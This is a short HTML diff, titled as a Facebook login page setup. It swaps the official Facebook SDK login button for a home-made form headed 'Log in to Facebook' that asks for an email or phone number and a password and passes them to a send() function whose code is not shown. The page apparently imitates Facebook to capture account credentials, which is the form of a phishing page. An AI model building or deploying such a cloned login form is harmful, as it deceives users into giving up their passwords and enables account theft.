Facebook login page setup

--- a/views/index.html
+++ b/views/index.html
@@ -3,16 +3,20 @@
     <head>
         <meta charset="UTF-8">
         <title>Login</title>
+        <link rel="stylesheet" href="stylesheets/login.css" type="text/css">
     </head>
     <body>
-        <div id="fb-root"></div>
-        <script>(function(d, s, id) {
-          var js, fjs = d.getElementsByTagName(s)[0];
-          if (d.getElementById(id)) return;
-          js = d.createElement(s); js.id = id;
-          js.src = 'https://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.10&appId=1871928153136541';
-          fjs.parentNode.insertBefore(js, fjs);
-        }(document, 'script', 'facebook-jssdk'));</script>
-        <div class="fb-login-button" data-max-rows="1" data-size="large" data-button-type="continue_with" data-show-faces="false" data-auto-logout-link="false" data-use-continue-as="false"></div>
+        <div id="wrapper">
+            <div class="center">
+				<div class="content">
+                    <div id="login">
+                        <h3>Log in to Facebook</h3>
+                        <input class="input" id="username" type="text" placeholder="Email address or phone number">
+                        <input class="input" id="password" type="password" placeholder="Password">
+                        <button class="input" onsubmit="return send();">Log In</button>
+                    </div>
+				</div>
+			</div>
+        </div>
     </body>
 </html>
